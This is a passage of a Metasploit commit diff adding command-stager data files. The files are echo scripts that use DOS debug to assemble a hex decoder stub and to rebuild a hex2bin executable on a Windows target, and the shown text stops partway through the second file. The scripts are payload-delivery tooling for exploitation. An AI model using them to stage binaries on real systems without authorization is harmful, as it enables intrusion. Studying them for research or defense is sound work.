big commit - lots of cmdstager changes

created 4 cmd stagers (instead of just one): CmdStagerVBS, CmdStagerDebugAsm, CmdStagerDebugWrite, CmdStagerTFTP created a TFTPServer mixin created Msf::Exploit::EXE mixin to generate executables updated all uses of CmdStager to use CmdStagerVBS for the time being add exploit for cve-2001-0333 using CmdStagerTFTP updated tftp server to wait for transfers to finish (up to 30 seconds) before shutting down write debug.exe stager stub in 16-bit assembly (used in CmdStagerDebugAsm) git-svn-id: file:///home/svn/framework3/trunk@9375 4d416f70-5f16-0410-b530-b9f4589650da
2010-05-26 22:39:56 +00:00 · 2010-05-26 22:39:56 +00:00 · 6d1e7bdaa5
parent ecba10c4fd
commit 6d1e7bdaa5
27 changed files with 2521 additions and 220 deletions
--- a/data/exploits/cmdstager/debug_asm
+++ b/data/exploits/cmdstager/debug_asm
@ -0,0 +1,91 @@
+echo a 0100 >>decoder_stub
+echo jmp 197 >>decoder_stub
+echo mov bx,[1bd] >>decoder_stub
+echo call 131 >>decoder_stub
+echo mov bx,[1cc] >>decoder_stub
+echo call 131 >>decoder_stub
+echo mov ax,4c00 >>decoder_stub
+echo int 21 >>decoder_stub
+echo mov ah,3d >>decoder_stub
+echo mov al,00 >>decoder_stub
+echo mov dx,1bf >>decoder_stub
+echo int 21 >>decoder_stub
+echo mov [1bd],ax >>decoder_stub
+echo ret >>decoder_stub
+echo mov ah,3c >>decoder_stub
+echo mov cx,2 >>decoder_stub
+echo mov dx,1ce >>decoder_stub
+echo int 21 >>decoder_stub
+echo mov [1cc],ax >>decoder_stub
+echo ret >>decoder_stub
+echo mov ax,3e00 >>decoder_stub
+echo int 21 >>decoder_stub
+echo ret >>decoder_stub
+echo mov bx,[1bd] >>decoder_stub
+echo mov ax,3f00 >>decoder_stub
+echo mov cx,100 >>decoder_stub
+echo mov dx,0200 >>decoder_stub
+echo int 21 >>decoder_stub
+echo cmp ax,2 >>decoder_stub
+echo ja 151 >>decoder_stub
+echo call 178 >>decoder_stub
+echo call 103 >>decoder_stub
+echo ret >>decoder_stub
+echo mov ah,0 >>decoder_stub
+echo or al,20 >>decoder_stub
+echo sub al,30 >>decoder_stub
+echo cmp al,9 >>decoder_stub
+echo jbe 164 >>decoder_stub
+echo sub al,31 >>decoder_stub
+echo cmp al,5 >>decoder_stub
+echo ja 165 >>decoder_stub
+echo add al,a >>decoder_stub
+echo ret >>decoder_stub
+echo mov ah,ff >>decoder_stub
+echo ret >>decoder_stub
+echo cmp bp,0 >>decoder_stub
+echo jne 175 >>decoder_stub
+echo call 137 >>decoder_stub
+echo mov bp,ax >>decoder_stub
+echo mov si,200 >>decoder_stub
+echo lodsb >>decoder_stub
+echo dec bp >>decoder_stub
+echo ret >>decoder_stub
+echo mov cx,di >>decoder_stub
+echo sub cx,300 >>decoder_stub
+echo mov bx,[1cc] >>decoder_stub
+echo mov ax,4000 >>decoder_stub
+echo mov dx,0300 >>decoder_stub
+echo int 21 >>decoder_stub
+echo ret >>decoder_stub
+echo call 168 >>decoder_stub
+echo call 152 >>decoder_stub
+echo cmp ah,0 >>decoder_stub
+echo jne 18b >>decoder_stub
+echo ret >>decoder_stub
+echo call 116 >>decoder_stub
+echo call 123 >>decoder_stub
+echo mov bp,0 >>decoder_stub
+echo mov di,300 >>decoder_stub
+echo call 18b >>decoder_stub
+echo mov cx,1000 >>decoder_stub
+echo mul cx >>decoder_stub
+echo push ax >>decoder_stub
+echo call 18b >>decoder_stub
+echo pop dx >>decoder_stub
+echo or al,dh >>decoder_stub
+echo stosb >>decoder_stub
+echo cmp bp, 0 >>decoder_stub
+echo jne 1a3 >>decoder_stub
+echo call 178 >>decoder_stub
+echo jmp 1a0 >>decoder_stub
+echo db 00,00 >>decoder_stub
+echo db "testfile.dat",00 >>decoder_stub
+echo db 00,00 >>decoder_stub
+echo db "testfile.out",00 >>decoder_stub
+echo  >>decoder_stub
+echo r cx >>decoder_stub
+echo 0400 >>decoder_stub
+echo n h2b.com >>decoder_stub
+echo w >>decoder_stub
+echo q >>decoder_stub
--- a/data/exploits/cmdstager/debug_write
+++ b/data/exploits/cmdstager/debug_write
@ -0,0 +1,819 @@
+echo n decoder_stub.bin > decoder_stub
+echo r cx >>decoder_stub
+echo 1400 >>decoder_stub
+echo f 0100 ffff 00 >>decoder_stub
+echo e 100 4d 5a 90 >>decoder_stub
+echo e 104 03 >>decoder_stub
+echo e 108 04 >>decoder_stub
+echo e 10c ff ff >>decoder_stub
+echo e 110 b8 >>decoder_stub
+echo e 118 40 >>decoder_stub
+echo e 13c 80 >>decoder_stub
+echo e 140 0e 1f ba 0e >>decoder_stub
+echo e 145 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 >>decoder_stub
+echo e 159 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 >>decoder_stub
+echo e 16d 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 >>decoder_stub
+echo e 180 50 45 >>decoder_stub
+echo e 184 4c 01 03 >>decoder_stub
+echo e 188 85 18 7c 48 >>decoder_stub
+echo e 194 e0 >>decoder_stub
+echo e 196 0e 01 0b 01 08 >>decoder_stub
+echo e 19d 0a >>decoder_stub
+echo e 1a1 08 >>decoder_stub
+echo e 1a8 be 28 >>decoder_stub
+echo e 1ad 20 >>decoder_stub
+echo e 1b1 40 >>decoder_stub
+echo e 1b6 40 >>decoder_stub
+echo e 1b9 20 >>decoder_stub
+echo e 1bd 02 >>decoder_stub
+echo e 1c0 04 >>decoder_stub
+echo e 1c8 04 >>decoder_stub
+echo e 1d1 80 >>decoder_stub
+echo e 1d5 02 >>decoder_stub
+echo e 1dc 03 >>decoder_stub
+echo e 1de 40 05 >>decoder_stub
+echo e 1e2 10 >>decoder_stub
+echo e 1e5 10 >>decoder_stub
+echo e 1ea 10 >>decoder_stub
+echo e 1ed 10 >>decoder_stub
+echo e 1f4 10 >>decoder_stub
+echo e 200 6c 28 >>decoder_stub
+echo e 204 4f >>decoder_stub
+echo e 209 40 >>decoder_stub
+echo e 20c 30 05 >>decoder_stub
+echo e 221 60 >>decoder_stub
+echo e 224 0c >>decoder_stub
+echo e 228 fc 27 >>decoder_stub
+echo e 22c 1c >>decoder_stub
+echo e 259 20 >>decoder_stub
+echo e 25c 08 >>decoder_stub
+echo e 268 08 20 >>decoder_stub
+echo e 26c 48 >>decoder_stub
+echo e 278 2e 74 65 78 74 >>decoder_stub
+echo e 280 c4 08 >>decoder_stub
+echo e 285 20 >>decoder_stub
+echo e 289 0a >>decoder_stub
+echo e 28d 02 >>decoder_stub
+echo e 29c 20 >>decoder_stub
+echo e 29f 60 2e 72 73 72 63 >>decoder_stub
+echo e 2a8 30 05 >>decoder_stub
+echo e 2ad 40 >>decoder_stub
+echo e 2b1 06 >>decoder_stub
+echo e 2b5 0c >>decoder_stub
+echo e 2c4 40 >>decoder_stub
+echo e 2c7 40 2e 72 65 6c 6f 63 >>decoder_stub
+echo e 2d0 0c >>decoder_stub
+echo e 2d5 60 >>decoder_stub
+echo e 2d9 02 >>decoder_stub
+echo e 2dd 12 >>decoder_stub
+echo e 2ec 40 >>decoder_stub
+echo e 2ef 42 >>decoder_stub
+echo e 300 a0 28 >>decoder_stub
+echo e 308 48 >>decoder_stub
+echo e 30c 02 >>decoder_stub
+echo e 30e 05 >>decoder_stub
+echo e 310 24 21 >>decoder_stub
+echo e 314 d8 06 >>decoder_stub
+echo e 318 01 >>decoder_stub
+echo e 31c 01 >>decoder_stub
+echo e 31f 06 >>decoder_stub
+echo e 350 13 30 04 >>decoder_stub
+echo e 354 be >>decoder_stub
+echo e 358 01 >>decoder_stub
+echo e 35b 11 >>decoder_stub
+echo e 35d 02 8e 69 17 fe 01 13 06 11 06 2d 12 >>decoder_stub
+echo e 36a 72 01 >>decoder_stub
+echo e 36e 70 28 10 >>decoder_stub
+echo e 373 0a >>decoder_stub
+echo e 376 38 9e >>decoder_stub
+echo e 37c 02 16 9a 28 11 >>decoder_stub
+echo e 383 0a 72 4b >>decoder_stub
+echo e 388 70 72 4f >>decoder_stub
+echo e 38d 70 6f 12 >>decoder_stub
+echo e 392 0a 72 51 >>decoder_stub
+echo e 397 70 72 4f >>decoder_stub
+echo e 39c 70 6f 12 >>decoder_stub
+echo e 3a1 0a 0a 06 6f 13 >>decoder_stub
+echo e 3a8 0a 18 5b 8d 15 >>decoder_stub
+echo e 3af 01 0b 16 0c 72 4f >>decoder_stub
+echo e 3b7 70 0d 16 13 04 2b 21 >>decoder_stub
+echo e 3bf 06 11 04 18 6f 14 >>decoder_stub
+echo e 3c7 0a 0d 07 08 09 1f 10 28 15 >>decoder_stub
+echo e 3d2 0a 9c 08 17 58 0c >>decoder_stub
+echo e 3d9 11 04 18 58 13 04 11 04 06 6f 13 >>decoder_stub
+echo e 3e6 0a fe 04 13 06 11 06 2d cf 02 16 9a 72 55 >>decoder_stub
+echo e 3f6 70 28 16 >>decoder_stub
+echo e 3fb 0a 28 17 >>decoder_stub
+echo e 400 0a 13 05 11 05 07 16 07 8e 69 6f 18 >>decoder_stub
+echo e 40e 0a >>decoder_stub
+echo e 410 11 05 6f 19 >>decoder_stub
+echo e 416 0a >>decoder_stub
+echo e 419 2a 1e 02 28 1a >>decoder_stub
+echo e 420 0a 2a >>decoder_stub
+echo e 424 42 53 4a 42 01 >>decoder_stub
+echo e 42a 01 >>decoder_stub
+echo e 430 0c >>decoder_stub
+echo e 434 76 32 2e 30 2e 35 30 37 32 37 >>decoder_stub
+echo e 442 05 >>decoder_stub
+echo e 444 6c >>decoder_stub
+echo e 448 30 02 >>decoder_stub
+echo e 44c 23 7e >>decoder_stub
+echo e 450 9c 02 >>decoder_stub
+echo e 454 d0 02 >>decoder_stub
+echo e 458 23 53 74 72 69 6e 67 73 >>decoder_stub
+echo e 464 6c 05 >>decoder_stub
+echo e 468 60 >>decoder_stub
+echo e 46c 23 55 53 >>decoder_stub
+echo e 470 cc 05 >>decoder_stub
+echo e 474 10 >>decoder_stub
+echo e 478 23 47 55 49 44 >>decoder_stub
+echo e 480 dc 05 >>decoder_stub
+echo e 484 fc >>decoder_stub
+echo e 488 23 42 6c 6f 62 >>decoder_stub
+echo e 494 02 >>decoder_stub
+echo e 497 01 47 15 02 >>decoder_stub
+echo e 49c 09 >>decoder_stub
+echo e 4a1 fa 01 33 >>decoder_stub
+echo e 4a5 16 >>decoder_stub
+echo e 4a8 01 >>decoder_stub
+echo e 4ac 18 >>decoder_stub
+echo e 4b0 02 >>decoder_stub
+echo e 4b4 02 >>decoder_stub
+echo e 4b8 01 >>decoder_stub
+echo e 4bc 1a >>decoder_stub
+echo e 4c0 0d >>decoder_stub
+echo e 4c4 01 >>decoder_stub
+echo e 4c8 01 >>decoder_stub
+echo e 4cc 01 >>decoder_stub
+echo e 4d2 0a >>decoder_stub
+echo e 4d4 01 >>decoder_stub
+echo e 4da 06 >>decoder_stub
+echo e 4dc 36 >>decoder_stub
+echo e 4de 2f >>decoder_stub
+echo e 4e0 06 >>decoder_stub
+echo e 4e2 5f >>decoder_stub
+echo e 4e4 4d >>decoder_stub
+echo e 4e6 06 >>decoder_stub
+echo e 4e8 76 >>decoder_stub
+echo e 4ea 4d >>decoder_stub
+echo e 4ec 06 >>decoder_stub
+echo e 4ee 93 >>decoder_stub
+echo e 4f0 4d >>decoder_stub
+echo e 4f2 06 >>decoder_stub
+echo e 4f4 b2 >>decoder_stub
+echo e 4f6 4d >>decoder_stub
+echo e 4f8 06 >>decoder_stub
+echo e 4fa cb >>decoder_stub
+echo e 4fc 4d >>decoder_stub
+echo e 4fe 06 >>decoder_stub
+echo e 500 e4 >>decoder_stub
+echo e 502 4d >>decoder_stub
+echo e 504 06 >>decoder_stub
+echo e 506 ff >>decoder_stub
+echo e 508 4d >>decoder_stub
+echo e 50a 06 >>decoder_stub
+echo e 50c 1a 01 4d >>decoder_stub
+echo e 510 06 >>decoder_stub
+echo e 512 52 01 33 01 06 >>decoder_stub
+echo e 518 66 01 33 01 06 >>decoder_stub
+echo e 51e 74 01 4d >>decoder_stub
+echo e 522 06 >>decoder_stub
+echo e 524 8d 01 4d >>decoder_stub
+echo e 528 06 >>decoder_stub
+echo e 52a bd 01 aa 01 3b >>decoder_stub
+echo e 530 d1 01 >>decoder_stub
+echo e 534 06 >>decoder_stub
+echo e 537 02 e0 01 06 >>decoder_stub
+echo e 53c 20 02 e0 01 06 >>decoder_stub
+echo e 542 3e 02 2f >>decoder_stub
+echo e 546 06 >>decoder_stub
+echo e 548 5a 02 50 02 06 >>decoder_stub
+echo e 54e 6b 02 2f >>decoder_stub
+echo e 552 06 >>decoder_stub
+echo e 554 85 02 2f >>decoder_stub
+echo e 558 06 >>decoder_stub
+echo e 55a 94 02 2f >>decoder_stub
+echo e 55e 06 >>decoder_stub
+echo e 560 aa 02 50 02 06 >>decoder_stub
+echo e 566 bc 02 50 02 >>decoder_stub
+echo e 56e 01 >>decoder_stub
+echo e 574 01 >>decoder_stub
+echo e 576 01 >>decoder_stub
+echo e 57a 10 >>decoder_stub
+echo e 57c 16 >>decoder_stub
+echo e 57e 1e >>decoder_stub
+echo e 580 05 >>decoder_stub
+echo e 582 01 >>decoder_stub
+echo e 584 01 >>decoder_stub
+echo e 586 50 20 >>decoder_stub
+echo e 58c 91 >>decoder_stub
+echo e 58e 3d >>decoder_stub
+echo e 590 0a >>decoder_stub
+echo e 592 01 >>decoder_stub
+echo e 594 1a 21 >>decoder_stub
+echo e 59a 86 18 42 >>decoder_stub
+echo e 59e 10 >>decoder_stub
+echo e 5a0 02 >>decoder_stub
+echo e 5a4 01 >>decoder_stub
+echo e 5a6 48 >>decoder_stub
+echo e 5a8 11 >>decoder_stub
+echo e 5aa 42 >>decoder_stub
+echo e 5ac 14 >>decoder_stub
+echo e 5ae 19 >>decoder_stub
+echo e 5b0 42 >>decoder_stub
+echo e 5b2 14 >>decoder_stub
+echo e 5b4 21 >>decoder_stub
+echo e 5b6 42 >>decoder_stub
+echo e 5b8 14 >>decoder_stub
+echo e 5ba 29 >>decoder_stub
+echo e 5bc 42 >>decoder_stub
+echo e 5be 14 >>decoder_stub
+echo e 5c0 31 >>decoder_stub
+echo e 5c2 42 >>decoder_stub
+echo e 5c4 14 >>decoder_stub
+echo e 5c6 39 >>decoder_stub
+echo e 5c8 42 >>decoder_stub
+echo e 5ca 14 >>decoder_stub
+echo e 5cc 41 >>decoder_stub
+echo e 5ce 42 >>decoder_stub
+echo e 5d0 14 >>decoder_stub
+echo e 5d2 49 >>decoder_stub
+echo e 5d4 42 >>decoder_stub
+echo e 5d6 14 >>decoder_stub
+echo e 5d8 51 >>decoder_stub
+echo e 5da 42 >>decoder_stub
+echo e 5dc 19 >>decoder_stub
+echo e 5de 59 >>decoder_stub
+echo e 5e0 42 >>decoder_stub
+echo e 5e2 14 >>decoder_stub
+echo e 5e4 61 >>decoder_stub
+echo e 5e6 42 >>decoder_stub
+echo e 5e8 14 >>decoder_stub
+echo e 5ea 69 >>decoder_stub
+echo e 5ec 42 >>decoder_stub
+echo e 5ee 14 >>decoder_stub
+echo e 5f0 71 >>decoder_stub
+echo e 5f2 42 >>decoder_stub
+echo e 5f4 1e >>decoder_stub
+echo e 5f6 81 >>decoder_stub
+echo e 5f8 42 >>decoder_stub
+echo e 5fa 24 >>decoder_stub
+echo e 5fc 89 >>decoder_stub
+echo e 5fe 42 >>decoder_stub
+echo e 600 10 >>decoder_stub
+echo e 602 91 >>decoder_stub
+echo e 604 46 02 29 >>decoder_stub
+echo e 608 99 >>decoder_stub
+echo e 60a 5f 02 2e >>decoder_stub
+echo e 60e a1 >>decoder_stub
+echo e 610 72 02 33 >>decoder_stub
+echo e 614 a1 >>decoder_stub
+echo e 616 7a 02 39 >>decoder_stub
+echo e 61a a1 >>decoder_stub
+echo e 61c 8a 02 3d >>decoder_stub
+echo e 620 b1 >>decoder_stub
+echo e 622 9c 02 43 >>decoder_stub
+echo e 626 a1 >>decoder_stub
+echo e 628 a3 02 49 >>decoder_stub
+echo e 62c 99 >>decoder_stub
+echo e 62e b5 02 4f >>decoder_stub
+echo e 632 c1 >>decoder_stub
+echo e 634 c3 02 55 >>decoder_stub
+echo e 638 c1 >>decoder_stub
+echo e 63a c9 02 10 >>decoder_stub
+echo e 63e 09 >>decoder_stub
+echo e 640 42 >>decoder_stub
+echo e 642 10 >>decoder_stub
+echo e 644 2e >>decoder_stub
+echo e 646 0b >>decoder_stub
+echo e 648 69 >>decoder_stub
+echo e 64a 2e >>decoder_stub
+echo e 64c 13 >>decoder_stub
+echo e 64e 76 >>decoder_stub
+echo e 650 2e >>decoder_stub
+echo e 652 1b >>decoder_stub
+echo e 654 76 >>decoder_stub
+echo e 656 2e >>decoder_stub
+echo e 658 23 >>decoder_stub
+echo e 65a 76 >>decoder_stub
+echo e 65c 2e >>decoder_stub
+echo e 65e 2b >>decoder_stub
+echo e 660 69 >>decoder_stub
+echo e 662 2e >>decoder_stub
+echo e 664 33 >>decoder_stub
+echo e 666 7c >>decoder_stub
+echo e 668 2e >>decoder_stub
+echo e 66a 3b >>decoder_stub
+echo e 66c 76 >>decoder_stub
+echo e 66e 2e >>decoder_stub
+echo e 670 4b >>decoder_stub
+echo e 672 76 >>decoder_stub
+echo e 674 2e >>decoder_stub
+echo e 676 53 >>decoder_stub
+echo e 678 94 >>decoder_stub
+echo e 67a 2e >>decoder_stub
+echo e 67c 63 >>decoder_stub
+echo e 67e be >>decoder_stub
+echo e 680 2e >>decoder_stub
+echo e 682 6b >>decoder_stub
+echo e 684 cb >>decoder_stub
+echo e 686 2e >>decoder_stub
+echo e 688 73 >>decoder_stub
+echo e 68a d4 >>decoder_stub
+echo e 68c 2e >>decoder_stub
+echo e 68e 7b >>decoder_stub
+echo e 690 dd >>decoder_stub
+echo e 692 5d >>decoder_stub
+echo e 694 04 80 >>decoder_stub
+echo e 698 01 >>decoder_stub
+echo e 6a6 1e >>decoder_stub
+echo e 6aa 02 >>decoder_stub
+echo e 6b6 01 >>decoder_stub
+echo e 6b8 26 >>decoder_stub
+echo e 6c1 3c 4d 6f 64 75 6c 65 3e >>decoder_stub
+echo e 6ca 68 65 78 32 62 69 6e 2e 65 78 65 >>decoder_stub
+echo e 6d6 50 72 6f 67 72 61 6d >>decoder_stub
+echo e 6de 68 65 78 32 62 69 6e >>decoder_stub
+echo e 6e6 6d 73 63 6f 72 6c 69 62 >>decoder_stub
+echo e 6ef 53 79 73 74 65 6d >>decoder_stub
+echo e 6f6 4f 62 6a 65 63 74 >>decoder_stub
+echo e 6fd 4d 61 69 6e >>decoder_stub
+echo e 702 2e 63 74 6f 72 >>decoder_stub
+echo e 708 61 72 67 73 >>decoder_stub
+echo e 70d 53 79 73 74 65 6d 2e 52 65 66 6c 65 63 74 69 6f 6e >>decoder_stub
+echo e 71f 41 73 73 65 6d 62 6c 79 54 69 74 6c 65 41 74 74 72 69 62 75 >>decoder_stub
+echo e 733 74 65 >>decoder_stub
+echo e 736 41 73 73 65 6d 62 6c 79 44 65 73 63 72 69 70 74 69 6f 6e 41 >>decoder_stub
+echo e 74a 74 74 72 69 62 75 74 65 >>decoder_stub
+echo e 753 41 73 73 65 6d 62 6c 79 43 6f 6e 66 69 67 75 72 61 74 69 6f >>decoder_stub
+echo e 767 6e 41 74 74 72 69 62 75 74 65 >>decoder_stub
+echo e 772 41 73 73 65 6d 62 6c 79 43 6f 6d 70 61 6e 79 41 74 74 72 69 >>decoder_stub
+echo e 786 62 75 74 65 >>decoder_stub
+echo e 78b 41 73 73 65 6d 62 6c 79 50 72 6f 64 75 63 74 41 74 74 72 69 >>decoder_stub
+echo e 79f 62 75 74 65 >>decoder_stub
+echo e 7a4 41 73 73 65 6d 62 6c 79 43 6f 70 79 72 69 67 68 74 41 74 74 >>decoder_stub
+echo e 7b8 72 69 62 75 74 65 >>decoder_stub
+echo e 7bf 41 73 73 65 6d 62 6c 79 54 72 61 64 65 6d 61 72 6b 41 74 74 >>decoder_stub
+echo e 7d3 72 69 62 75 74 65 >>decoder_stub
+echo e 7da 41 73 73 65 6d 62 6c 79 43 75 6c 74 75 72 65 41 74 74 72 69 >>decoder_stub
+echo e 7ee 62 75 74 65 >>decoder_stub
+echo e 7f3 53 79 73 74 65 6d 2e 52 75 6e 74 69 6d 65 2e 49 6e 74 65 72 >>decoder_stub
+echo e 807 6f 70 53 65 72 76 69 63 65 73 >>decoder_stub
+echo e 812 43 6f 6d 56 69 73 69 62 6c 65 41 74 74 72 69 62 75 74 65 >>decoder_stub
+echo e 826 47 75 69 64 41 74 74 72 69 62 75 74 65 >>decoder_stub
+echo e 834 41 73 73 65 6d 62 6c 79 56 65 72 73 69 6f 6e 41 74 74 72 69 >>decoder_stub
+echo e 848 62 75 74 65 >>decoder_stub
+echo e 84d 41 73 73 65 6d 62 6c 79 46 69 6c 65 56 65 72 73 69 6f 6e 41 >>decoder_stub
+echo e 861 74 74 72 69 62 75 74 65 >>decoder_stub
+echo e 86a 53 79 73 74 65 6d 2e 44 69 61 67 6e 6f 73 74 69 63 73 >>decoder_stub
+echo e 87d 44 65 62 75 67 67 61 62 6c 65 41 74 74 72 69 62 75 74 65 >>decoder_stub
+echo e 891 44 65 62 75 67 67 69 6e 67 4d 6f 64 65 73 >>decoder_stub
+echo e 8a0 53 79 73 74 65 6d 2e 52 75 6e 74 69 6d 65 2e 43 6f 6d 70 69 >>decoder_stub
+echo e 8b4 6c 65 72 53 65 72 76 69 63 65 73 >>decoder_stub
+echo e 8c0 43 6f 6d 70 69 6c 61 74 69 6f 6e 52 65 6c 61 78 61 74 69 6f >>decoder_stub
+echo e 8d4 6e 73 41 74 74 72 69 62 75 74 65 >>decoder_stub
+echo e 8e0 52 75 6e 74 69 6d 65 43 6f 6d 70 61 74 69 62 69 6c 69 74 79 >>decoder_stub
+echo e 8f4 41 74 74 72 69 62 75 74 65 >>decoder_stub
+echo e 8fe 43 6f 6e 73 6f 6c 65 >>decoder_stub
+echo e 906 57 72 69 74 65 4c 69 6e 65 >>decoder_stub
+echo e 910 53 79 73 74 65 6d 2e 49 4f >>decoder_stub
+echo e 91a 46 69 6c 65 >>decoder_stub
+echo e 91f 52 65 61 64 41 6c 6c 54 65 78 74 >>decoder_stub
+echo e 92b 53 74 72 69 6e 67 >>decoder_stub
+echo e 932 52 65 70 6c 61 63 65 >>decoder_stub
+echo e 93a 67 65 74 5f 4c 65 6e 67 74 68 >>decoder_stub
+echo e 945 42 79 74 65 >>decoder_stub
+echo e 94a 53 75 62 73 74 72 69 6e 67 >>decoder_stub
+echo e 954 43 6f 6e 76 65 72 74 >>decoder_stub
+echo e 95c 54 6f 42 79 74 65 >>decoder_stub
+echo e 963 43 6f 6e 63 61 74 >>decoder_stub
+echo e 96a 46 69 6c 65 53 74 72 65 61 6d >>decoder_stub
+echo e 975 43 72 65 61 74 65 >>decoder_stub
+echo e 97c 53 74 72 65 61 6d >>decoder_stub
+echo e 983 57 72 69 74 65 >>decoder_stub
+echo e 989 43 6c 6f 73 65 >>decoder_stub
+echo e 991 49 55 >>decoder_stub
+echo e 994 73 >>decoder_stub
+echo e 996 61 >>decoder_stub
+echo e 998 67 >>decoder_stub
+echo e 99a 65 >>decoder_stub
+echo e 99c 3a >>decoder_stub
+echo e 99e 20 >>decoder_stub
+echo e 9a0 20 >>decoder_stub
+echo e 9a2 20 >>decoder_stub
+echo e 9a4 68 >>decoder_stub
+echo e 9a6 65 >>decoder_stub
+echo e 9a8 78 >>decoder_stub
+echo e 9aa 32 >>decoder_stub
+echo e 9ac 62 >>decoder_stub
+echo e 9ae 69 >>decoder_stub
+echo e 9b0 6e >>decoder_stub
+echo e 9b2 2e >>decoder_stub
+echo e 9b4 65 >>decoder_stub
+echo e 9b6 78 >>decoder_stub
+echo e 9b8 65 >>decoder_stub
+echo e 9ba 20 >>decoder_stub
+echo e 9bc 3c >>decoder_stub
+echo e 9be 68 >>decoder_stub
+echo e 9c0 65 >>decoder_stub
+echo e 9c2 78 >>decoder_stub
+echo e 9c4 69 >>decoder_stub
+echo e 9c6 6e >>decoder_stub
+echo e 9c8 70 >>decoder_stub
+echo e 9ca 75 >>decoder_stub
+echo e 9cc 74 >>decoder_stub
+echo e 9ce 66 >>decoder_stub
+echo e 9d0 69 >>decoder_stub
+echo e 9d2 6c >>decoder_stub
+echo e 9d4 65 >>decoder_stub
+echo e 9d6 3e >>decoder_stub
+echo e 9d8 08 >>decoder_stub
+echo e 9da 01 03 0d >>decoder_stub
+echo e 9df 01 >>decoder_stub
+echo e 9e1 03 0a >>decoder_stub
+echo e 9e5 09 2e >>decoder_stub
+echo e 9e8 65 >>decoder_stub
+echo e 9ea 78 >>decoder_stub
+echo e 9ec 65 >>decoder_stub
+echo e 9f0 06 24 bb c2 bc b7 11 40 bf c4 9c a7 d7 ed 8c f2 >>decoder_stub
+echo e a01 08 b7 7a 5c 56 19 34 e0 89 05 >>decoder_stub
+echo e a0c 01 01 1d 0e 03 20 >>decoder_stub
+echo e a13 01 04 20 01 01 0e 04 20 01 01 02 05 20 01 01 11 3d 04 20 01 >>decoder_stub
+echo e a27 01 08 04 >>decoder_stub
+echo e a2b 01 01 0e 04 >>decoder_stub
+echo e a30 01 0e 0e 05 20 02 0e 0e 0e 03 20 >>decoder_stub
+echo e a3c 08 05 20 02 0e 08 08 05 >>decoder_stub
+echo e a45 02 05 0e 08 05 >>decoder_stub
+echo e a4b 02 0e 0e 0e 05 >>decoder_stub
+echo e a51 01 12 5d 0e 07 20 03 01 1d 05 08 08 0b 07 07 0e 1d 05 08 0e >>decoder_stub
+echo e a65 08 12 5d 02 0c 01 >>decoder_stub
+echo e a6c 07 68 65 78 32 62 69 6e >>decoder_stub
+echo e a76 05 01 >>decoder_stub
+echo e a7c 17 01 >>decoder_stub
+echo e a7f 12 43 6f 70 79 72 69 67 68 74 20 c2 a9 20 20 32 30 30 38 >>decoder_stub
+echo e a94 29 01 >>decoder_stub
+echo e a97 24 66 39 39 39 62 62 62 31 2d 66 31 30 61 2d 34 39 65 38 2d >>decoder_stub
+echo e aab 38 33 35 37 2d 30 35 39 61 30 63 65 37 37 31 36 38 >>decoder_stub
+echo e abe 0c 01 >>decoder_stub
+echo e ac1 07 31 2e 30 2e 30 2e 30 >>decoder_stub
+echo e acb 08 01 >>decoder_stub
+echo e ace 07 01 >>decoder_stub
+echo e ad4 08 01 >>decoder_stub
+echo e ad7 08 >>decoder_stub
+echo e add 1e 01 >>decoder_stub
+echo e ae0 01 >>decoder_stub
+echo e ae2 54 02 16 57 72 61 70 4e 6f 6e 45 78 63 65 70 74 69 6f 6e 54 >>decoder_stub
+echo e af6 68 72 6f 77 73 01 >>decoder_stub
+echo e b00 85 18 7c 48 >>decoder_stub
+echo e b08 02 >>decoder_stub
+echo e b0c 53 >>decoder_stub
+echo e b10 18 28 >>decoder_stub
+echo e b14 18 0a >>decoder_stub
+echo e b18 52 53 44 53 e8 fc 2e 9d aa 52 59 42 a5 63 1e b1 c8 f6 59 23 >>decoder_stub
+echo e b2c 03 >>decoder_stub
+echo e b30 53 3a 5c 73 74 75 66 66 5c 70 72 6f 67 72 61 6d 6d 69 6e 67 >>decoder_stub
+echo e b44 5c 68 65 78 32 62 69 6e 5c 68 65 78 32 62 69 6e 5c 6f 62 6a >>decoder_stub
+echo e b58 5c 44 65 62 75 67 5c 68 65 78 32 62 69 6e 2e 70 64 62 >>decoder_stub
+echo e b6c 94 28 >>decoder_stub
+echo e b78 ae 28 >>decoder_stub
+echo e b7d 20 >>decoder_stub
+echo e b94 a0 28 >>decoder_stub
+echo e ba2 5f 43 6f 72 45 78 65 4d 61 69 6e >>decoder_stub
+echo e bae 6d 73 63 6f 72 65 65 2e 64 6c 6c >>decoder_stub
+echo e bbe ff 25 >>decoder_stub
+echo e bc1 20 40 >>decoder_stub
+echo e d0e 02 >>decoder_stub
+echo e d10 10 >>decoder_stub
+echo e d14 20 >>decoder_stub
+echo e d17 80 18 >>decoder_stub
+echo e d1c 38 >>decoder_stub
+echo e d1f 80 >>decoder_stub
+echo e d2e 01 >>decoder_stub
+echo e d30 01 >>decoder_stub
+echo e d34 50 >>decoder_stub
+echo e d37 80 >>decoder_stub
+echo e d46 01 >>decoder_stub
+echo e d48 01 >>decoder_stub
+echo e d4c 68 >>decoder_stub
+echo e d4f 80 >>decoder_stub
+echo e d5e 01 >>decoder_stub
+echo e d64 80 >>decoder_stub
+echo e d76 01 >>decoder_stub
+echo e d7c 90 >>decoder_stub
+echo e d80 a0 40 >>decoder_stub
+echo e d84 a0 02 >>decoder_stub
+echo e d90 40 43 >>decoder_stub
+echo e d94 ea 01 >>decoder_stub
+echo e da0 a0 02 34 >>decoder_stub
+echo e da6 56 >>decoder_stub
+echo e da8 53 >>decoder_stub
+echo e daa 5f >>decoder_stub
+echo e dac 56 >>decoder_stub
+echo e dae 45 >>decoder_stub
+echo e db0 52 >>decoder_stub
+echo e db2 53 >>decoder_stub
+echo e db4 49 >>decoder_stub
+echo e db6 4f >>decoder_stub
+echo e db8 4e >>decoder_stub
+echo e dba 5f >>decoder_stub
+echo e dbc 49 >>decoder_stub
+echo e dbe 4e >>decoder_stub
+echo e dc0 46 >>decoder_stub
+echo e dc2 4f >>decoder_stub
+echo e dc8 bd 04 ef fe >>decoder_stub
+echo e dce 01 >>decoder_stub
+echo e dd2 01 >>decoder_stub
+echo e dda 01 >>decoder_stub
+echo e de0 3f >>decoder_stub
+echo e de8 04 >>decoder_stub
+echo e dec 01 >>decoder_stub
+echo e dfc 44 >>decoder_stub
+echo e e00 01 >>decoder_stub
+echo e e02 56 >>decoder_stub
+echo e e04 61 >>decoder_stub
+echo e e06 72 >>decoder_stub
